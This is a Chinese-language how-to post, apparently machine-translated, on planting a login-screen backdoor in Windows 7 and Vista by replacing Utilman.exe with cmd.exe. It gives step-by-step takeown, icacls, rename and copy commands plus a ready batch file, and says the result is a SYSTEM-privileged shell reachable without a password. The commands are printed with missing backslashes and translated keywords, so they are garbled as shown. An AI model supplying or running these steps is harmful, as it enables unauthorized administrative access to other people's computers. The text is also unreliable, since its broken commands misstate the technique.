怎么样不用软件给电脑留后门(win7和winVista系统怎么创建简单的后门)

如果您有使用Windows7或Vista的任何经验，您将知道默认情况下禁用管理员帐户。在XP中，通过在登录屏幕上按两次Ctrl-alt-delete来获取一个简单的后门，以使您进入正确的登录提示，并登录到不受保护的管理员帐户。因为这在Windows7或Vista中是不可能的，所以我寻找一种不同的方式来进入。

当您进入Windows7的登录屏幕时

，有三个门导致不同的情况：

用户帐户：如果单击该密码，通常会为您提供密码提示，并且该帐户已受密码保护。这里没有什么...关机按钮：为您提供重启，关机或让计算机进入睡眠状态的选项。另一个死胡同......轻松访问按钮：为您提供多种选项，以提高Windows7或Vista的可用性。这些选项必须存储在WINDOWS文件夹中的某个位置......让我们一起来看看。

经过一番研究，我发现轻松访问选项执行的可执行文件在WINDOWS的system32文件夹中称为“Utilman.exe”。

如果我们用命令提示符替换该实用程序怎么办？

所以，我试图用不同的可执行文件替换它。不幸的是，我无法更改其名称，或删除它-它已被锁定。我尝试使用我最喜欢的解锁实用程序Unlocker，但该程序与Windows7不兼容。所以我在网上研究了一种更好的解锁方法。我找到了一个合适的命令行参数，允许我取得文件的所有权，瞧！解锁的Utilman.exe文件。

以下是制作后门的步骤：

1.获取Utilman.exe文件的完全所有权。

takeown/f“c：windowssystem32Utilman.exe

2.修改控制此文件的访问控制列表，并授予我们完全管理员对该文件的访问权限。

icacls“c：windowssystem32Utilman.exe”/grantadministrators：F

3.重命名Utilman.exe文件，以便Windows不会随时调用它。

重命名c：windowssystem32Utilman.exeUtilman2.exe

4.将命令行可执行文件复制到同一文件夹中，并将其重命名为通用名称，以便它不会干扰原始命令行可执行文件。我用过cmd5.exe。

copyc：windowssystem32cmd.exec：windowssystem32cmd5.exe

5.将复制的命令行可执行文件重命名为Utilman.exe，从而用命令提示符替换EaseofAccess实用程序。

重命名c：windowssystem32cmd5.exeUtilman.exe

而且你已经完成了！确保以管理员身份运行所有这些命令，方法是右键单击命令提示符文件并选择“以管理员身份运行”。

我冒昧地编写了一个批处理文件，当以管理员身份运行时，它会在眨眼之间执行所有这些步骤。要创建自己的文件，只需使用记事本打开.txt文件，将这些命令复制到文件中：

takeown/f“c：windowssystem32Utilman.exe

icacls“c：windowssystem32Utilman.exe”/grantadministrators：F

重命名c：windowssystem32Utilman.exeUtilman2.exe

copyc：windowssystem32cmd.exec：windowssystem32cmd5.exe

重命名c：windowssystem32cmd5.exeUtilman.exe

另存为：

<无论你想要取什么名字>.bat

右键单击“以管理员身份运行”。

要测试它是否有效，请重新启动计算机，当它出现在登录屏幕上时，请单击“轻松访问”按钮，而不是登录。它应该为您提供具有SYSTEM权限的命令shell。

请用户使用后，及时关闭后门。不然造成个后果自负哦